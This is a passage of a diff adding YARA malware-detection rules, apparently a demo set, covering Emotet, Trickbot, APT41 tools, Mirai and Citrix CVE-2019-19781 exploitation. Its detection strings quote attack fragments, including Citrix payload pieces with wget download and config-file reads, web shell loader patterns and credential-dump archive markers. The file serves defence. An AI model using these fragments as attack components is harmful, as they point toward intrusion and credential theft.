+      $x1 = "<root>1</root>" 
+      $x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(" 
+      $s1 = "XsltSettings.TrustedXslt" 
+      $s2 = "Xml.XmlUrlResolver" 
+      $s3 = "FromBase64String(Request[\"" 
+   condition: 
+      filesize < 500KB and $csharpshell and ( 1 of ( $x* ) or all of ( $s* ) )
+}
+
+rule MAL_Emotet_Jan20_1_RID2D22 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Emotet malware"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/"
+      date = "2020-01-29 10:18:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $op0 = { 74 60 8d 34 18 eb 54 03 c3 50 ff 15 18 08 41 00 } 
+      $op1 = { 03 fe 66 39 07 0f 85 2a ff ff ff 8b 4d f0 6a 20 } 
+      $op2 = { 8b 7d fc 0f 85 49 ff ff ff 85 db 0f 84 d1 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 200KB and ( pe.imphash ( ) == "009889c73bd2e55113bf6dfa5f395e0d" or 1 of them )
+}
+
+rule SUSP_BAT_Aux_Jan20_1_RID2D89 : DEMO FILE SCRIPT SUSP {
+   meta:
+      description = "Detects BAT file often dropped to cleanup temp dirs during infection"
+      author = "Florian Roth"
+      reference = "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
+      date = "2020-01-29 10:36:01"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f5d558ec505b635b1e37557350562ad6f79b3da5cf2cf74db6e6e648b7a47127"
+      tags = "DEMO, FILE, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if exist \"C:\\Users\\" ascii
+      $s2 = "\\AppData\\Local\\Temp\\" ascii
+      $s3 = "del \"C:\\Users\\" ascii
+      $s4 = ".bat\"" ascii
+      $s5 = ".exe\" goto" ascii
+   condition: 
+      uint8 ( 0 ) == 0x3a and filesize <= 1KB and all of them
+}
+
+rule SUSP_PS1_FromBase64String_Content_Indicator_RID3714 : DEMO SCRIPT SUSP T1059_001 T1086 T1132 {
+   meta:
+      description = "Detects suspicious base64 encoded PowerShell expressions"
+      author = "Florian Roth"
+      reference = "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639"
+      date = "2020-01-25 17:23:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "DEMO, SCRIPT, SUSP, T1059_001, T1086, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "::FromBase64String(\"H4s" ascii wide
+      $ = "::FromBase64String(\"TVq" ascii wide
+      $ = "::FromBase64String(\"UEs" ascii wide
+      $ = "::FromBase64String(\"JAB" ascii wide
+      $ = "::FromBase64String(\"SUVY" ascii wide
+      $ = "::FromBase64String(\"SQBFAF" ascii wide
+      $ = "::FromBase64String(\"SQBuAH" ascii wide
+      $ = "::FromBase64String(\"PAA" ascii wide
+      $ = "::FromBase64String(\"cwBhA" ascii wide
+      $ = "::FromBase64String(\"aWV4" ascii wide
+      $ = "::FromBase64String(\"aQBlA" ascii wide
+      $ = "::FromBase64String(\"R2V0" ascii wide
+      $ = "::FromBase64String(\"dmFy" ascii wide
+      $ = "::FromBase64String(\"dgBhA" ascii wide
+      $ = "::FromBase64String(\"dXNpbm" ascii wide
+      $ = "::FromBase64String(\"H4sIA" ascii wide
+      $ = "::FromBase64String(\"Y21k" ascii wide
+      $ = "::FromBase64String(\"Qzpc" ascii wide
+      $ = "::FromBase64String(\"Yzpc" ascii wide
+      $ = "::FromBase64String(\"IAB" ascii wide
+      $ = "::FromBase64String('H4s" ascii wide
+      $ = "::FromBase64String('TVq" ascii wide
+      $ = "::FromBase64String('UEs" ascii wide
+      $ = "::FromBase64String('JAB" ascii wide
+      $ = "::FromBase64String('SUVY" ascii wide
+      $ = "::FromBase64String('SQBFAF" ascii wide
+      $ = "::FromBase64String('SQBuAH" ascii wide
+      $ = "::FromBase64String('PAA" ascii wide
+      $ = "::FromBase64String('cwBhA" ascii wide
+      $ = "::FromBase64String('aWV4" ascii wide
+      $ = "::FromBase64String('aQBlA" ascii wide
+      $ = "::FromBase64String('R2V0" ascii wide
+      $ = "::FromBase64String('dmFy" ascii wide
+      $ = "::FromBase64String('dgBhA" ascii wide
+      $ = "::FromBase64String('dXNpbm" ascii wide
+      $ = "::FromBase64String('H4sIA" ascii wide
+      $ = "::FromBase64String('Y21k" ascii wide
+      $ = "::FromBase64String('Qzpc" ascii wide
+      $ = "::FromBase64String('Yzpc" ascii wide
+      $ = "::FromBase64String('IAB" ascii wide
+   condition: 
+      filesize < 5000KB and 1 of them
+}
+
+rule EXPL_Shitrix_Exploit_Code_Jan20_1_RID331C : CVE_2019_19781 DEMO EXPLOIT T1105 {
+   meta:
+      description = "Detects payloads used in Shitrix exploitation CVE-2019-19781"
+      author = "Florian Roth"
+      reference = "https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/"
+      date = "2020-01-13 14:33:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      type = "file"
+      tags = "CVE_2019_19781, DEMO, EXPLOIT, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s01 = "/netscaler/portal/scripts/rmpm.pl" ascii
+      $s02 = "tee /netscaler/portal/templates/" ascii
+      $s03 = "exec(\\'(wget -q -O- http://" ascii
+      $s04 = "cd /netscaler/portal; ls" ascii
+      $s05 = "cat /flash/nsconfig/ns.conf" ascii
+      $s06 = "/netscaler/portal/scripts/PersonalBookmak.pl" ascii
+      $s07 = "template.new({'BLOCK'='print readpipe(" ascii
+      $s08 = "pwnpzi1337" fullword ascii
+      $s09 = "template.new({'BLOCK'=" 
+      $s10 = "template.new({'BLOCK'%3d" 
+      $s11 = "my ($citrixmd, %FORM);" 
+      $s12 = "(CMD, \"($citrixmd) 2>&1" 
+      $b1 = "NSC_USER:" ascii nocase
+      $b2 = "NSC_NONCE:" ascii nocase
+      $b3 = "/../" ascii
+   condition: 
+      1 of ( $s* ) or all of ( $b* )
+}
+
+rule SUSP_VHD_Suspicious_Small_Size_RID3285 : DEMO FILE SUSP {
+   meta:
+      description = "Detects suspicious VHD files"
+      author = "Florian Roth"
+      reference = "https://twitter.com/MeltX0R/status/1208095892877774850"
+      date = "2019-12-21 14:08:41"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3382a75bd959d2194c4b1a8885df93e8770f4ebaeaff441a5180ceadf1656cd9"
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $hc1 = { 63 6F 6E 65 63 74 69 78 } 
+   condition: 
+      uint16 ( 0 ) == 0x6f63 and $hc1 at 0 and filesize <= 4000KB
+}
+
+rule SUSP_RAR_NtdsDIT_RID2C79 : DEMO FILE SUSP {
+   meta:
+      description = "Detects suspicious RAR file that contains ntds.dit or SAM export"
+      author = "Florian Roth"
+      reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+      date = "2019-12-16 09:50:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ntds.dit0" ascii fullword
+      $x2 = { 0? 53 41 4D 30 01 00 03 } 
+      $x3 = { 0? 73 61 6D 30 01 00 03 } 
+   condition: 
+      uint32 ( 0 ) == 0x21726152 and 1 of them
+}
+
+rule MAL_Mirai_Nov19_1_RID2CC8 : DEMO FILE MAL {
+   meta:
+      description = "Detects Mirai malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/bad_packets/status/1194049104533282816"
+      date = "2019-11-13 10:03:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bbb83da15d4dabd395996ed120435e276a6ddfbadafb9a7f096597c869c6c739"
+      hash2 = "fadbbe439f80cc33da0222f01973f27cce9f5ab0709f1bfbf1a954ceac5a579b"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SERVZUXO" fullword ascii
+      $s2 = "-loldongs" fullword ascii
+      $s3 = "/dev/null" fullword ascii
+      $s4 = "/bin/busybox" fullword ascii
+      $sc1 = { 47 72 6F 75 70 73 3A 09 30 } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize <= 100KB and 4 of them
+}
+
+rule SUSP_XORed_Mozilla_RID2DB4 : DEMO SUSP T1110 {
+   meta:
+      description = "Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key."
+      author = "Florian Roth"
+      reference = "https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()"
+      date = "2019-10-28 10:43:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-05-13"
+      tags = "DEMO, SUSP, T1110"
+      minimum_yara = "3.8.0"
+      
+   strings:
+      $xo1 = "Mozilla/5.0" xor ascii wide
+      $xof1 = "Mozilla/5.0" ascii wide
+      $fp1 = "Sentinel Labs" wide
+      $fp2 = "<filter object at" ascii
+   condition: 
+      $xo1 and not $xof1 and not 1 of ( $fp* )
+}
+
+rule MAL_CRIME_CobaltGang_Malware_Oct19_1_RID3392 : CRIME DEMO EXE FILE G0080 MAL {
+   meta:
+      description = "Detects CobaltGang malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/vxsh4d0w/status/1187353649015611392"
+      date = "2019-10-24 14:53:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "72125933265f884ceb8ab64ab303ea76aaeb7877faee8976d398acd0d0b7356b"
+      hash2 = "893339624602c7b3a6f481aed9509b53e4e995d6771c72d726ba5a6b319608a7"
+      hash3 = "3c34bbf641df25f9accd05b27b9058e25554fdfea0e879f5ca21ffa460ad2b01"
+      tags = "CRIME, DEMO, EXE, FILE, G0080, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $op_a1 = { 0f 44 c2 eb 0a 31 c0 80 fa 20 0f 94 c0 01 c0 5d } 
+      $op_b1 = { 89 e5 53 8b 55 08 8b 4d 0c 8a 1c 01 88 1c 02 83 } 
+      $op_b2 = { 89 e5 53 8b 55 08 8b 45 0c 8a 1c 0a 88 1c 08 83 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 2000KB and ( pe.imphash ( ) == "d1e3f8d02cce09520379e5c1e72f862f" or pe.imphash ( ) == "8e26df99c70f79cb8b1ea2ef6f8e52ac" or ( $op_a1 and 1 of ( $op_b* ) ) )
+}
+
+rule SUSP_TINY_PE_RID2AF3 : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects Tiny PE file"
+      author = "Florian Roth"
+      reference = "https://webserver2.tecgraf.puc-rio.br/~ismael/Cursos/YC++/apostilas/win32_xcoff_pe/tyne-example/Tiny%20PE.htm"
+      date = "2019-10-23 09:36:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $header = { 4D 5A 00 00 50 45 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and uint16 ( 4 ) == 0x4550 and filesize <= 20KB and $header at 0
+}
+
+rule SUSP_WER_Critical_HeapCorruption_RID3345 : DEMO FILE SUSP {
+   meta:
+      description = "Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)"
+      author = "Florian Roth"
+      reference = "https://twitter.com/cyb3rops/status/1185459425710092288"
+      date = "2019-10-18 14:40:41"
+      score = 45
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $a1 = "ReportIdentifier=" wide
+      $a2 = ".Name=Fault Module Name" wide
+      $s1 = "c0000374" wide
+   condition: 
+      ( uint32be ( 0 ) == 0x56006500 or uint32be ( 0 ) == 0xfffe5600 ) and all of them
+}
+
+rule LOG_TeamViewer_Connect_Chinese_Keyboard_Layout_RID38FF : CHINA DEMO LOG T1072 T1219 {
+   meta:
+      description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Chinese keyboard layout"
+      author = "Florian Roth"
+      reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
+      date = "2019-10-12 18:45:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-12-16"
+      tags = "CHINA, DEMO, LOG, T1072, T1219"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Changing keyboard layout to: 0804" ascii
+      $x2 = "Changing keyboard layout to: 042a" 
+      $fp1 = "Changing keyboard layout to: 08040804" ascii
+      $fp2 = "Changing keyboard layout to: 042a042a" ascii
+   condition: 
+      ( #x1 + #x2 ) > ( #fp1 + #fp2 )
+}
+
+rule LOG_TeamViewer_Connect_Russian_Keyboard_Layout_RID3925 : DEMO LOG T1072 T1219 {
+   meta:
+      description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Russian keyboard layout"
+      author = "Florian Roth"
+      reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
+      date = "2019-10-12 18:51:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-07"
+      tags = "DEMO, LOG, T1072, T1219"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Changing keyboard layout to: 0419" ascii
+      $fp1 = "Changing keyboard layout to: 04190419" ascii
+   condition: 
+      #x1 > #fp1
+}
+
+rule MAL_Emotet_JS_Dropper_Oct19_1_RID316E : DEMO FILE MAL {
+   meta:
+      description = "Detects Emotet JS dropper"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/aaa75105-dc85-48ca-9732-085b2ceeb6eb/"
+      date = "2019-10-03 13:22:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "38295d728522426672b9497f63b72066e811f5b53a14fb4c4ffc23d4efbbca4a"
+      hash2 = "9bc004a53816a5b46bfb08e819ac1cf32c3bdc556a87a58cbada416c10423573"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { FF FE 76 00 61 00 72 00 20 00 61 00 3D 00 5B 00
+               27 00 } 
+   condition: 
+      uint32 ( 0 ) == 0x0076feff and filesize <= 700KB and $xc1 at 0
+}
+
+rule MAL_Trickbot_Malware_Oct19_2_RID3134 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Trickbot malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-10-02 13:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+      hash2 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\User\\Desktop\\Encrypt\\Math_Cad\\Release\\Math_Cad.pdb" fullword ascii
+      $x2 = "AxedWV3OVTFfnGb" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
+}
+
+rule MAL_Trickbot_Malware_Oct19_3_RID3135 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Trickbot malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-10-02 13:12:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
+      hash2 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+      hash3 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "Decrypt Shell Fail" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of them or pe.imphash ( ) == "4e3fbfbf1fc23f646cd40a6fe09385a7" )
+}
+
+rule MAL_Trickbot_Malware_Oct19_4_RID3136 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Trickbot malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-10-02 13:12:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
+      hash2 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
+      hash3 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "c:\\users\\user\\documents\\visual studio 2005\\projects\\adzxser\\release\\ADZXSER.pdb" fullword ascii
+      $x2 = "http://root-hack.org" fullword ascii
+      $x3 = "http://hax-studios.net" fullword ascii
+      $x4 = "5OCFBBKCAZxWUE#$_SVRR[SQJ" fullword ascii
+      $x5 = "G*\\AC:\\Users\\911\\Desktop\\cButtonBar\\cButtonBar\\ButtonBar.vbp" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
+}
+
+rule MAL_Trickbot_Malware_Oct19_5_RID3137 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Trickbot malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-10-02 13:13:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
+      hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+      hash3 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LoadShellCode" fullword ascii
+      $s2 = "pShellCode" fullword ascii
+      $s3 = "InitShellCode" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 2000KB and 2 of them
+}
+
+rule MAL_Trickbot_Malware_Oct19_6_RID3138 : DEMO EXE FILE MAL T1060 {
+   meta:
+      description = "Detects Trickbot malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2019-10-02 13:13:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
+      hash2 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
+      tags = "DEMO, EXE, FILE, MAL, T1060"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "D:\\MyProjects\\spreader\\Release\\ssExecutor_x86.pdb" fullword ascii
+      $s1 = "%s\\appdata\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%s" fullword ascii
+      $s2 = "%s\\appdata\\roaming\\%s" fullword ascii
+      $s3 = "WINDOWS\\SYSTEM32\\TASKS" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize <= 400KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule SUSP_Unsigned_OSPPSVC_RID2E85 : DEMO EXE FILE OFFICE SUSP T1035 {
+   meta:
+      description = "Detects a suspicious unsigned office software protection platform service binary"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/"
+      date = "2019-09-26 11:18:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5294a730f1f0a176583b9ca2b988b3f5ec65dad8c6ebe556b5135566f2c16a56"
+      tags = "DEMO, EXE, FILE, OFFICE, SUSP, T1035"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $sc1 = { 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63
+               00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00
+               00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+               00 66 00 74 00 20 00 4F 00 66 00 66 00 69 00 63
+               00 65 00 20 00 53 00 6F 00 66 00 74 00 77 00 61
+               00 72 00 65 00 20 00 50 00 72 00 6F 00 74 00 65
+               00 63 00 74 00 69 00 6F 00 6E 00 20 00 50 00 6C
+               00 61 00 74 00 66 00 6F 00 72 00 6D 00 20 00 53
+               00 65 00 72 00 76 00 69 00 63 00 65 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 8000KB and $sc1 and pe.number_of_signatures < 1
+}
+
+rule MAL_ArtraDownloader2_Aug19_1_RID30FB : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects ArtraDownloader malware"
+      author = "Florian Roth"
+      reference = "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
+      date = "2019-08-27 13:03:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $xc1 = { 47 45 54 20 25 73 20 48 54 54 50 2F 31 2E 30 00
+               0D 0A 00 00 48 6F 73 74 3A 20 25 73 00 00 00 00
+               3F 61 3D 00 26 62 3D 00 26 63 3D 00 26 64 3D 00
+               26 65 3D 00 25 32 30 } 
+      $xc2 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
+               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 25 73 20
+               25 64 0D 0A 0D 0A 25 73 00 00 00 00 71 72 79 3D } 
+      $xc3 = { 49 44 3D 25 73 00 00 00 3A 00 00 00 25 73 20 25
+               73 20 25 73 0D 0A 25 73 20 25 73 0D 0A 25 73 25
+               73 0D 0A 25 73 25 73 0D 0A 43 6F 6E 74 65 6E 74
+               2D 6C 65 6E 67 74 68 25 73 20 25 64 } 
+      $xc4 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
+               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 43 6F 6E
+               74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 25 64 0D
+               0A 0D 0A 25 73 } 
+      $x1 = "Tpguxbsf]Njdsptpgu" ascii
+      $x2 = ".gpsn.vsmfodpefe" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
+}
+
+rule APT_APT41_POISONPLUG_3_RID2DA0 : APT DEMO EXE FILE G0096 MAL T1085 {
+   meta:
+      description = "Detects APT41 malware POISONPLUG"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 10:39:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e"
+      tags = "APT, DEMO, EXE, FILE, G0096, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii
+      $s2 = "tcpview.exe" fullword ascii
+      $s3 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" fullword ascii
+      $s4 = "AxEeulaVteSgeR" fullword ascii
+      $s5 = "%04d-%02d-%02d_%02d-%02d-%02d.dmp" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 900KB and 3 of them
+}
+
+rule APT_APT41_POISONPLUG_SHADOW_RID2F33 : APT DEMO EXE FILE G0096 MAL {
+   meta:
+      description = "Detects APT41 malware POISONPLUG SHADOW"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 11:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
+      tags = "APT, DEMO, EXE, FILE, G0096, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and pe.imphash ( ) == "c67de089f2009b21715744762fc484e8"
+}
+
+rule APT_APT41_CRACKSHOT_RID2CA0 : APT DEMO EXE FILE G0096 MAL {
+   meta:
+      description = "Detects APT41 malware CRACKSHOT"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 09:57:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31"
+      tags = "APT, DEMO, EXE, FILE, G0096, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ";procmon64.exe;netmon.exe;tcpview.exe;MiniSniffer.exe;smsniff.exe" ascii
+      $s1 = "RunUrlBinInMem" fullword ascii
+      $s2 = "DownRunUrlFile" fullword ascii
+      $s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36" fullword ascii
+      $s4 = "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 250KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule APT_APT41_POISONPLUG_2_RID2D9F : APT DEMO EXE FILE G0096 MAL {
+   meta:
+      description = "Detects APT41 malware POISONPLUG"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 10:39:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb"
+      tags = "APT, DEMO, EXE, FILE, G0096, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ma_lockdown_service.dll" fullword wide
+      $s2 = "acbde.dll" fullword ascii
+      $s3 = "MA lockdown Service" fullword wide
+      $s4 = "McAfee Agent" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 11000KB and all of them
+}
+
+rule APT_APT41_POISONPLUG_RID2D0E : APT DEMO EXE FILE G0096 MAL {
+   meta:
+      description = "Detects APT41 malware POISONPLUG"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+      date = "2019-08-07 10:15:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd"
+      hash2 = "5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90"
+      hash3 = "f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661"
+      tags = "APT, DEMO, EXE, FILE, G0096, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "TSMSISrv.DLL" fullword wide
+      $s2 = "[-]write failed[%d]" fullword ascii
+      $s3 = "[-]load failed" fullword ascii
+      $s4 = "Remote Desktop Services" fullword wide
+   condition: 
